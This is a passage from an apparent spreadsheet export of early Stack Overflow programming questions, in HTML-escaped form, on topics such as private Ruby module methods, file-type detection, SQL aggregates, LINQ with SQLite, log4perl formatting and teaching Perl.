&lt;li&gt;&lt;strong&gt;Class&lt;/strong&gt; with static methods&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Mixin&lt;/strong&gt; module for inclusion into the data structure&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Refactor&lt;/strong&gt; out the part of the algorithm that modifies that data structure (very small) and make that a mixin that calls the static methods of the algorithm module&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Technical part&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Is there any way to make a &lt;strong&gt;private Module method&lt;/strong&gt;?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;module Thing
  def self.pub; puts "Public method"; end
  private
  def self.priv; puts "Private method"; end
end
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;strong&gt;The &lt;code&gt;private&lt;/code&gt; in there doesn't seem to have any effect&lt;/strong&gt;, I can still call &lt;code&gt;Thing.priv&lt;/code&gt; without issue.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there an easy way to determine the type of a file without knowing the file's extension?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a table with a binary column which stores files of a number of different possible filetypes (PDF, BMP, JPEG, WAV, MP3, DOC, MPEG, AVI etc.), but no columns that store either the name or the type of the original file.  Is there any easy way for me to process these rows and determine the type of each file stored in the binary column?  Preferably it would be a utility that only reads the file headers, so that I don't have to fully extract each file to determine its type.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Clarification&lt;/strong&gt;:  I know that the approach here involves reading just the beginning of each file.  I'm looking for a good resource (aka links) that can do this for me without too much fuss.  Thanks.&lt;/p&gt;
&lt;p&gt;Also, &lt;strong&gt;just C#/.NET on Windows, please&lt;/strong&gt;.  I'm not using Linux and can't use Cygwin (doesn't work on Windows CE, among other reasons).&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Anyone seen good embedded help in a web application?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a pretty simple app on the web (written in Flex) which is very straightforward to use once it has data inside it.  The steps to get data inside it are themselves also pretty simple, but not at all obvious to my audience when they first log into my app.  &lt;/p&gt;
&lt;p&gt;I have been wrestling with how to communicate the data setup process to my users without referring them to a separate help.  I also don't want to clog my lovely, elegant UI (which has uniformly been praised for its clarity from my current users and matches their processes very well) with wizards, or worse still an annoying animated paperclip.&lt;/p&gt;
&lt;p&gt;I have a very rich set of tools available for the web UI but I am looking for inspiration and wondered if anyone had experienced good web-based, intuitive, unobtrusive, genuinely helpful process/usage instructions embedded in an application and could point me to a link so I can take a look for myself.&lt;/p&gt;
&lt;p&gt;Failing that anyone got any bright ideas?  There are about 5 steps involved each one visiting a different page of the existing app to enter/upload data.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Any tips on how to organize Eclipse environment on multiple monitors?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I can't find a good way of putting Eclipse windows on two monitors. Currently I just detached (clicked on a header and dragged) a few windows to a secondary monitor (package explorer, console, and outline) while leaving primary monitor with maximized source editing window. &lt;/p&gt;
&lt;p&gt;It works pretty well except few annoying issues. Detached windows are not in focus while you are editing your code. Which means that, for example, last build shortcut (&lt;kbd&gt;Alt&lt;/kbd&gt;-&lt;kbd&gt;Shift&lt;/kbd&gt;-&lt;kbd&gt;X&lt;/kbd&gt;, &lt;kbd&gt;Q&lt;/kbd&gt;) doesn't work because it can't find build file (because package explorer is not in focus). Also "Selected resources" option in a file search menu is not picking up current package selection.&lt;/p&gt;
&lt;p&gt;So I was wondering is detaching windows a right way to go? Do you have any better solutions so at least package explorer stays in focus?&lt;/p&gt;
&lt;p&gt;Thanks.&lt;/p&gt;
&lt;p&gt;PS. Btw "unable to find build" error started showing up only in 3.4 ver for some reason.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to create an element without hardcoding the name</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I tried this but it does not seem to be valid syntax.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;xsl:element name="$myElementName"&amp;gt;&amp;lt;/xsl:element&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>How to access the layer of a view?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I would like to apply a transformation (rotation) to a &lt;code&gt;UIImageView&lt;/code&gt;. I could just set the &lt;code&gt;transform&lt;/code&gt; property of the view, but wouldn't setting the layer's &lt;code&gt;transform&lt;/code&gt; make it faster? If so, how can I achieve this?&lt;/p&gt;
&lt;p&gt;Assuming I have a &lt;code&gt;UIImageView&lt;/code&gt; initialized with an image, can anyone help? Wouldn't it be better to have a &lt;code&gt;UIVIew&lt;/code&gt; with a &lt;code&gt;UIImageView&lt;/code&gt; in it?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do you use LINQ with Sqlite</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Would someone explain how to get LINQ working with Sqlite.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Cascading to a auto completing text box</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a web page where the user will enter their address. They will select their country and region in cascading drop down lists. I would like to provide an auto completing textbox for their city, but I want to be context sensitive to the country and region selections. I would have just used another cascading drop down list, however the number of cities exceeds the maximum number of list items. &lt;/p&gt;
&lt;p&gt;Any suggestions or cool code spinets out there that may help me out?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Postgresql Concurrency</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In a project that I'm working, there's a table with a "on update" trigger, that monitors if a boolean column has changed (ex.: false -&gt; true = do some action). But this action can only be done once for a row.&lt;/p&gt;
&lt;p&gt;There will be multiple clients accessing the database, so I can suppose that eventually, multiple clients will try to update the same row column in parallel.&lt;/p&gt;
&lt;p&gt;Does the "update" trigger itself handle the concurrency itself, or I need to do it in a transaction and manually lock the table?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How many dimensions in an array with no value</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm a little lost (still working with Ron Jeffries's book). Here's a simple class:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public class Model{
    private String[] lines;
    public void myMethod(){
        String[] newLines = new String[lines.length + 2];
        for (i = 0, i &amp;lt;= lines.length, i++) {
            newLines[i] = lines[i];
        }
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I have another class that initializes Model, and an empty array, by setting myModel = new String[0]. When I invoke myModel.myMethod(), I get a subscript out of range error. Looking at the debugger, what I see is that myModel.lines has zero dimensions and zero length. Shouldn't it have a dimension and length of 1? Granted the value of lines[0] is null, but the array itself shouldn't be, should it? &lt;/p&gt;
&lt;p&gt;Any thoughts truly appreciated. &lt;/p&gt;
&lt;p&gt;Randy&lt;/p&gt;
</t>
  </si>
  <si>
    <t>RESTful Authentication</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What does RESTful Authentication mean and how does it work?  I can't find a good overview on Google.  My only understanding is that you pass the session key (remeberal) in the URL, but this could be horribly wrong.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>PHP Shipping Calculator</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Does anyone know of a freeware shipping calculator for PHP?  I do not want anything too fancy, and it can be compatible with any of the major US domestic shipping services.&lt;/p&gt;
&lt;p&gt;If anyone knows of one that is a plugin for CodeIgniter that would be nice.&lt;/p&gt;
&lt;p&gt;Travis&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Postage Calculator for PHP</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Could anyone point me in the right direction for a shipping calculator?  I would like something simple and I don't want to sign up for too much stuff.&lt;/p&gt;
&lt;p&gt;EDIT: I do not want to deal with all the registering and stuff the API would require... I think I may just try to make one using the zone charts USPS provides.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Escaping Bracket [ in a CONTAINS() clause?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How can I escape a bracket in a full-text SQL Server &lt;code&gt;contains()&lt;/code&gt; query? I've tried all the following, &lt;em&gt;none&lt;/em&gt; of which work:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;CONTAINS(crev.RawText, 'arg[0]')
CONTAINS(crev.RawText, 'arg[[0]]')
CONTAINS(crev.RawText, 'arg\[0\]')
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Using double quotes does work, but it &lt;strong&gt;forces the entire search to be a phrase&lt;/strong&gt;, which is a showstopper for multiple word queries. &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;CONTAINS(crev.RawText, '"arg[0]"')
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;All I really want to do is escape the bracket, but I can't seem to do that..&lt;/p&gt;
</t>
  </si>
  <si>
    <t>SQLite C/C++ API unsigned char *</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Why does the SQLite C/C++ API return &lt;code&gt;unsigned char *&lt;/code&gt;s for text values as opposed to the more de-facto &lt;code&gt;char *&lt;/code&gt; type?&lt;/p&gt;
&lt;p&gt;This is somewhat related to &lt;a href="http://stackoverflow.com/questions/75191/unsigned-char"&gt;the unsigned char&lt;/a&gt; question, except that the SQLite API's decision seems opposite of the conventional &lt;code&gt;char *&lt;/code&gt; advice given for string-like values.&lt;/p&gt;
&lt;p&gt;For example:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;const unsigned char *sqlite3_column_text(sqlite3_stmt*, int iCol);
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>how to translate the SQL code "having" condition into LinqToSQL or LinqToEntites?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Could you tell me how to translate the following SQL code to Linq To SQL or Linq To Entites?&lt;/p&gt;
&lt;p&gt;The correct SQL code is: &lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;select CollectId,url,userid,pubtime
  from Collect group by
  url,collectid,userid,pubtime  having
  pubtime &gt;= (select max(pubtime) from
  collect d where d.url = collect.url  )
  order by Collect.pubtime desc&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The database table script is:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;if exists (select * from sysobjects
  where id = OBJECT_ID('[Collect]') and
  OBJECTPROPERTY(id, 'IsUserTable') = 1)
  DROP TABLE [Collect]&lt;/p&gt;
  &lt;p&gt;CREATE TABLE [Collect] ( [CollectId]
  [int]  IDENTITY (1, 1)  NOT NULL,
  [Url] [nvarchar]  (200) NULL, [UserId]
  [nvarchar]  (50) NULL, [PubTime]
  [datetime]  NULL)&lt;/p&gt;
  &lt;p&gt;ALTER TABLE [Collect] WITH NOCHECK ADD
  CONSTRAINT [PK_Collect] PRIMARY KEY 
  NONCLUSTERED ( [CollectId] ) SET
  IDENTITY_INSERT [Collect] ON&lt;/p&gt;
  &lt;p&gt;INSERT [Collect]
  ([CollectId],[Url],[UserId],[PubTime])
  VALUES (
  1,'www.sohu.com','Mike','2008-10-10
  0:00:00') INSERT [Collect]
  ([CollectId],[Url],[UserId],[PubTime])
  VALUES (
  2,'www.echina365.com','Lily','2008-10-15
  0:00:00') INSERT [Collect]
  ([CollectId],[Url],[UserId],[PubTime])
  VALUES (
  3,'www.php.com','Tom','2008-10-20
  0:00:00') INSERT [Collect]
  ([CollectId],[Url],[UserId],[PubTime])
  VALUES (
  4,'www.echina365.com','YaoMing','2008-10-23
  0:00:00') INSERT [Collect]
  ([CollectId],[Url],[UserId],[PubTime])
  VALUES (
  5,'www.echina365.com','Mike','2008-10-25
  0:00:00') INSERT [Collect]
  ([CollectId],[Url],[UserId],[PubTime])
  VALUES (
  6,'www.sohu.com','Jack','2008-10-26
  0:00:00') INSERT [Collect]
  ([CollectId],[Url],[UserId],[PubTime])
  VALUES (
  7,'www.echina365.com','Tracy','2008-11-2
  0:00:00') INSERT [Collect]
  ([CollectId],[Url],[UserId],[PubTime])
  VALUES (
  8,'www.php.com','YaoMing','2008-11-5
  0:00:00')&lt;/p&gt;
  &lt;p&gt;SET IDENTITY_INSERT [Collect] OFF&lt;/p&gt;
&lt;/blockquote&gt;
</t>
  </si>
  <si>
    <t>How do I effectively find duplicate blob rows in MySQL?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a table of the form &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;CREATE TABLE data
{
   pk INT PRIMARY KEY AUTO_INCREMENT,
   dt BLOB
};
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;It has about 160,000 rows and about 2GB of data in the blob column (avg. 14kb per blob). Another table has foreign keys into this table.&lt;/p&gt;
&lt;p&gt;Something like 3000 of the blobs are identical. So what I want is a query that will give me a re map table that will allow me to remove the duplicates.&lt;/p&gt;
&lt;p&gt;The naive approach took about an hour on 30-40k rows:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SELECT a.pk, MIN(b.pk) 
    FROM data AS a 
    JOIN data AS b
  ON a.dt=b.dt
  WHERE b.pk &amp;lt; a.pk
  GROUP BY a.pk;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I happen to have, for other reasons, a table that has the sizes of the blobs:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;CREATE TABLE sizes
(
   fk INT,  // note: non-unique
   sz INT
   // other cols
);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;By building indexes for both fk and another for sz the direct query from that takes about 24 sec with 50k rows:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SELECT da.pk,MIN(db.pk) 
  FROM data AS da
  JOIN data AS db
  JOIN sizes AS sa
  JOIN sizes AS sb
  ON
        sa.size=sb.size
    AND da.pk=sa.fk
    AND db.pk=sb.fk
  WHERE
        sb.fk&amp;lt;sa.fk
    AND da.dt=db.dt 
  GROUP BY da.pk;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;However that is doing a full table scan on da (the data table). Given that the  hit rate should be fairly low I'd think that an index scan would be better. With that in mind in added a 3rd copy of data as a 5th join to get that, and lost about 3 sec.&lt;/p&gt;
&lt;p&gt;OK so for the question: &lt;em&gt;Am I going to get much better than the second select?&lt;/em&gt; If so, how?&lt;/p&gt;
&lt;p&gt;A bit of a corollary is: if I have a table where the key column's get very heavy use but the rest should only get rarely used, will I ever be better off adding another join of that table to encourage an index scan vs. a full table scan?&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;Xgc on #mysql@irc.freenode.net points out that the adding a utility table like sizes but with a unique constraint on &lt;code&gt;fk&lt;/code&gt; might help a lot. Some fun with triggers and what not might make it even not to bad to keep up to date.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is it possible to programmatically add a softkey shortcut to an application in Symbian</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is it possible for a Symbian S60 application to automatically add itself to one of the softkeys. The best would be if it could be done at installation time but if there is some API that can be used to add a shortcut the first time the application runs that would also be ok in our case.&lt;/p&gt;
&lt;p&gt;Does Symbian has some best practices around this. I can guess that some users may be upset  if some application overwrites his settings if he/she has configured the softkey shortcuts to refer some other application, &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Integer division rounding with negatives in C++</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Suppose &lt;code&gt;a&lt;/code&gt; and &lt;code&gt;b&lt;/code&gt; are both of type &lt;code&gt;int&lt;/code&gt;, and &lt;code&gt;b&lt;/code&gt; is nonzero.  Consider the result of performing &lt;code&gt;a/b&lt;/code&gt; in the following cases:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;code&gt;a&lt;/code&gt; and &lt;code&gt;b&lt;/code&gt; are both nonnegative.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;a&lt;/code&gt; and &lt;code&gt;b&lt;/code&gt; are both negative.&lt;/li&gt;
&lt;li&gt;Exactly one of them is negative.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;In Case 1 the result is rounded down to the nearest integer.  But what does the standard say about Cases 2 and 3?  An old draft I found floating on the Internet indicates that it is implementation dependent (yes, even case 2) but the committee is leaning toward making it always 'round toward zero.'  Does anyone know what the (latest) standard says?  Please answer only based on the standard, not what makes sense, or what particular compilers do.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What should I teach a beginning Perl programmer?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am going to spend 30 minutes teaching Perl to an experienced programmer.  The best way to learn Perl is by writing code.  In addition to CPAN, what would you show a programmer so they would understand the expressiveness of Perl, the amount of functionality provided by CPAN, while keeping everything clean and tidy so they walk away comfortable with the language?   I'll save the tricky stuff for another day.  &lt;/p&gt;
&lt;pre&gt;
use warnings;
use strict;
# use A_CPAN_LIB;
sub example_func1 {
  # use the CPAN lib or demonstrate some basic feature of Perl
}
example_func1();
# ...
__END__
&lt;/pre&gt;
&lt;p&gt;&lt;hr&gt;
Here's what I came up with...&lt;br&gt;&lt;/p&gt;
&lt;h2&gt;Where to Start&lt;/h2&gt;
&lt;p&gt;Believe it or not, the man pages.  Ok, we'll just use perldoc instead to be Windows friendly.&lt;/p&gt;
&lt;p&gt;The perldoc pages (or man pages on Unix/Mac) are excellent for Perl.  You can type man perl or perldoc perl&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;perldoc perl&lt;/strong&gt;; # Show an overview and dozens of tutorials; man perl is the same.&lt;br&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;perldoc perlintro&lt;/strong&gt;; # A Perl intro for beginners; man perlintro&lt;br&gt;
&lt;strong&gt;perldoc perlrequick&lt;/strong&gt;; # An example Perl regex tutoral&lt;br&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;perldoc perlfunc&lt;/strong&gt;; # Shows builtin Perl functions&lt;br&gt;
&lt;strong&gt;perldoc perlre&lt;/strong&gt;; # More Perl regex.&lt;br&gt;&lt;/p&gt;
&lt;h2&gt;CPAN&lt;/h2&gt;
&lt;p&gt;There are thousands of libraries on the Perl library site CPAN.&lt;br&gt;
&lt;strong&gt;perl -MCPAN -e 'install DateTime'&lt;/strong&gt;&lt;br&gt;&lt;/p&gt;
&lt;p&gt;perldoc works for installed modules too: perldoc module&lt;br&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;perldoc DateTime&lt;/strong&gt;&lt;br&gt;
&lt;strong&gt;perldoc DBI&lt;/strong&gt;; #  Database API.  If this doesn't work then install it:&lt;br&gt;
 &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;strong&gt;perl -MCPAN -e 'install DBI'&lt;/strong&gt;&lt;/p&gt;
&lt;h2&gt;Recommended Modules&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;perl -MCPAN -e 'install Moose'&lt;/strong&gt;; # Perl does OOP&lt;br&gt;
&lt;strong&gt;perldoc Moose&lt;/strong&gt;; # Tell me more about the Moose&lt;br&gt;
&lt;strong&gt;perl -MCPAN -e 'install CGI'&lt;/strong&gt;; # Quick and dirty web pages&lt;br&gt;
&lt;strong&gt;perl -MCPAN -e 'install Catalyst'&lt;/strong&gt;; # Big web framework.  Sometimes have problems installing. Google is your friend&lt;br&gt;
&lt;strong&gt;perl -MCPAN -e 'install CGI::Application'&lt;/strong&gt;; # Another web framework&lt;br&gt;
&lt;strong&gt;perldoc CGI::Application&lt;/strong&gt;; # Take a quick look at the docs&lt;br&gt;
&lt;br&gt;
A little Q&amp;amp;A.&lt;br&gt;
&lt;br&gt;
Q: Why should I use Perl instead Ruby or Python?&lt;br&gt;
A: More people use Perl.  There are more libraries for Perl(way more).  Perl is a really great GTD language.&lt;br&gt;
&lt;br&gt;
Q: Why do people hate Perl?&lt;br&gt;
A: You can do some ugly stuff with it.  Remember use warnings; use strict; in all of your code.  You can check your code before running it.  &lt;strong&gt;perl -c&lt;/strong&gt; hello.pl&lt;br&gt;&lt;/p&gt;
&lt;p&gt;&lt;br&gt;&lt;/p&gt;
&lt;h2&gt;Perl Topics&lt;/h2&gt;
&lt;h3&gt;Using Perl with Databases&lt;/h3&gt;
&lt;p&gt;&lt;a href="http://www.perl.com/pub/a/1999/10/DBI.html"&gt;http://www.perl.com/pub/a/1999/10/DBI.html
&lt;br&gt;&lt;/p&gt;
&lt;h3&gt;Using Perl for Web Development&lt;/h3&gt;
&lt;p&gt;&lt;a href="http://www.catalystframework.org"&gt;http://www.catalystframework.org
&lt;br&gt;&lt;/p&gt;
&lt;h3&gt;OO Perl&lt;/h3&gt;
&lt;p&gt;&lt;a href="http://www.iinteractive.com/moose"&gt;http://www.iinteractive.com/moose
&lt;br&gt;&lt;/p&gt;
&lt;h3&gt;Perl 1-Liners&lt;/h3&gt;
&lt;p&gt;&lt;a href="http://www.perlmonks.org/?node_id=470397"&gt;http://www.perlmonks.org/?node_id=470397&lt;br&gt;
&lt;a href="http://sial.org/howto/perl/one-liner"&gt;http://sial.org/howto/perl/one-liner&lt;/a&gt;
&lt;br&gt;&lt;/p&gt;
&lt;h3&gt;Other Tutorials&lt;/h3&gt;
&lt;p&gt;&lt;a href="http://perlmonks.org/index.pl?node=Tutorials"&gt;http://perlmonks.org/index.pl?node=Tutorials&lt;/a&gt;&lt;/p&gt;
&lt;h2&gt;Books&lt;/h2&gt;
&lt;p&gt;There are dozens.&lt;br&gt;
&lt;a href="http://www.amazon.com/s/ref=nb%5Fss%5Fgw?url=search-alias%3Dstripbooks&amp;amp;field-keywords=perl&amp;amp;x=0&amp;amp;y=0"&gt;http://www.amazon.com/s/ref=nb%5Fss%5Fgw?url=search-alias%3Dstripbooks&amp;amp;field-keywords=perl&amp;amp;x=0&amp;amp;y=0&lt;/a&gt;&lt;br&gt;
&lt;br&gt;&lt;/p&gt;
&lt;h2&gt;Websites&lt;/h2&gt;
&lt;p&gt;&lt;a href="http://perlmonks.com"&gt;Perlmonks&lt;/a&gt;&lt;br&gt;
&lt;a href="http://www.perl.org"&gt;Perl.org&lt;/a&gt;&lt;br&gt;
&lt;a href="http://pleac.sourceforge.net"&gt;Pleac&lt;/a&gt;&lt;br&gt;
&lt;a href="http://stackoverflow.com/questions/161872/hidden-features-of-perl"&gt;StackOverFlow's Hidden Features of Perl&lt;/a&gt;&lt;br&gt;
&lt;a href="http://www.cpan.org/misc/cpan-faq.html"&gt;CPAN FAQ&lt;/a&gt;&lt;br&gt;
&lt;a href="http://www.stonehenge.com/merlyn/LinuxMag"&gt;Randall Schwartz's articles&lt;/a&gt;&lt;br&gt;
&lt;br&gt;
&lt;br&gt;&lt;/p&gt;
&lt;h2&gt;Getting Help&lt;/h2&gt;
&lt;p&gt;&lt;a href="http://www.nabble.com/Perl-f13578.html"&gt;Perl Nabble Forum&lt;/a&gt;&lt;br&gt;
IRC Channels: freenode, irc.perl.org.  There are several:&lt;br&gt;
&lt;br&gt;
irc://irc.perl.org/perl&lt;/a&gt;&lt;br&gt;
irc://irc.perl.org/catalyst&lt;/a&gt;&lt;br&gt;
irc://irc.freenode.net/modperl&lt;/a&gt;&lt;br&gt;
irc://irc.perl.org/perl6&lt;/a&gt;&lt;br&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>create databases in ms-access, then delete a particular database. using any vb query or vb code</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;i want to create a number of databases in ms-access using a code or any option of ms-access, but i want delete databases also.
            Please help me&lt;/p&gt;
</t>
  </si>
  <si>
    <t>anyone know of a shared To-do list plugin for eclipse</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Does anyone know of shared TODO list plugin for Eclipse that allows users in a a development team to all view and edit the same list of tasks?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I divide an ordered list of integers into evenly sized sublists?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Does anyone have a good algorithm for taking an ordered list of integers, i.e.:&lt;br /&gt;
[1, 3, 6, 7, 8, 10, 11, 13, 14, 17, 19, 23, 25, 27, 28]&lt;/p&gt;
&lt;p&gt;into a given number of evenly sized ordered sublists, i.e. for 4 it will be:&lt;br /&gt;
[1, 3, 6] [7, 8, 10, 11] [13, 14, 17, 19] [23, 25, 27, 28]&lt;/p&gt;
&lt;p&gt;The requirement being that each of the sublists are ordered and as similar in size as possible.  &lt;/p&gt;
</t>
  </si>
  <si>
    <t>sql - Using aggregate functions (min/max) as part of select statement</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to return the minimum and maximum prices for a villa booking system. I have a look up table that stores the price for each week for each villa. &lt;/p&gt;
&lt;p&gt;I am using the min and max functions to do this within the select but I'm having lots of problems. Can anyone explain where i'm going wrong? Heres the sp&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;ALTER PROCEDURE spVillaGet 
-- Add the parameters for the stored procedure here
@accomodationTypeFK int = null,
@regionFK int = null,
@arrivalDate datetime = null,
@numberOfNights int = null,
@sleeps int = null,
@priceFloor money = null,
@priceCeil money = null
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;AS
BEGIN
    -- SET NOCOUNT ON added to prevent extra result sets from
    -- interfering with SELECT statements.
    SET NOCOUNT ON;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;-- Insert statements for procedure here
SELECT tblVillas.name, 
	   tblVillas.introduction,
	   tblVillas.italian_introduction,
	   tblVillas.uk_content,
	   tblVillas.italian_content,
	   tblVillas.sleeps,
	   tblVillas.postcode,
	   tblLkUpRegions.regionName,
	   tblLkUpAccomodationTypes.accomodationType,
	   MIN(price) As MinPrice,
	   MAX(price) As MaxPrice
FROM tblVillas
LEFT JOIN tblLkUpRegions on tblVillas.regionFK = tblLkUpRegions.regionID
LEFT JOIN tblLkUpAccomodationTypes on tblVillas.accomodationTypeFK = tblLkUpAccomodationTypes.accomodationId    
LEFT JOIN tblWeeklyPrices on tblWeeklyPrices.villaFK = tblVillas.villaId
WHERE
	((@accomodationTypeFK is null OR accomodationTypeFK = @accomodationTypeFK)
	 AND (@regionFK is null OR regionFK = @regionFK)
	 AND (@sleeps is null OR sleeps = @sleeps) 
	 AND tblVillas.deleted = 0)
GROUP BY tblVillas.name
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>threadPool.SetMaxThreads returning false</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;My understanding of SetMaxThreads() in C# was that it can not be set to less than the number of processors.&lt;/p&gt;
&lt;p&gt;But in my code I am unable to set the number to less than 8, I have no idea why this is.&lt;/p&gt;
&lt;p&gt;If I set it to lower it returns false!&lt;/p&gt;
&lt;p&gt;(Running an Intel Core 2)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I make log4perl output easier to read?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;When using &lt;a href="http://log4perl.sourceforge.net/" rel="nofollow"&gt;log4perl&lt;/a&gt;, the debug log layout that I'm using is :&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;log4perl.appender.D10.layout=PatternLayout
log4perl.appender.D10.layout.ConversionPattern=%d [pid=%P] %p %F{1} (%L) %M %m%n
log4perl.appender.D10.Filter = DebugAndUp
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This produces very verbose debug logs, for example:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;2008/11/26 11:57:28 [pid=25485] DEBUG SomeModule.pm (331) functions::SomeModule::Test Test XXX was successfull
2008/11/26 11:57:29 [pid=25485] ERROR SomeOtherUnrelatedModule.pm (99999) functions::SomeModule::AnotherTest AnotherTest YYY has faled
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This works great, and provides excellent debugging data.&lt;/p&gt;
&lt;p&gt;However, each line of the debug log contains different function names, pid length, etc. This makes each line layout differently, and makes reading debug logs much harder than it needs to be.&lt;/p&gt;
&lt;p&gt;Is there a way in log4perl to format the line so that the debugging metadata (everything up until the actual log message) be padded at the end with spaces/tabs, and have the actual message start at the same column of text?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Which is better apply two conditions in nested If or using single with And?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Nested If or single if with And operator,  which is better approach?&lt;br&gt;
&lt;strong&gt;Single If with And&lt;/strong&gt;    &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;if (txtPackage.Text != string.Empty &amp;amp;&amp;amp; txtPackage.Text == "abc")
{
   //
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;strong&gt;Nested If&lt;/strong&gt;  &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;if (txtPackage.Text != string.Empty)
{ 
  if (txtPackage.Text == "abc")
  {
     //
  }
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>How do I generate a compiled lambda with method calls?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm generating compiled getter methods at runtime for a given member.  Right now, my code just assumes that the result of the getter method is a string (worked good for testing).  However, I'd like to make this work with a custom converter class I've written, see below, "ConverterBase" reference that I've added.&lt;/p&gt;
&lt;p&gt;I can't figure out how to add the call to the converter class to my expression tree.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;    public Func&amp;lt;U, string&amp;gt; GetGetter&amp;lt;U&amp;gt;(MemberInfo info)
    {
        Type t = null;
        if (info is PropertyInfo) 
        {
            t = ((PropertyInfo)info).PropertyType;
        }
        else if (info is FieldInfo)
        {
            t = ((FieldInfo)info).FieldType;
        }
        else
        {
            throw new Exception("Unknown member type");
        }
        //TODO, replace with ability to specify in custom attribute
        ConverterBase typeConverter = new ConverterBase();
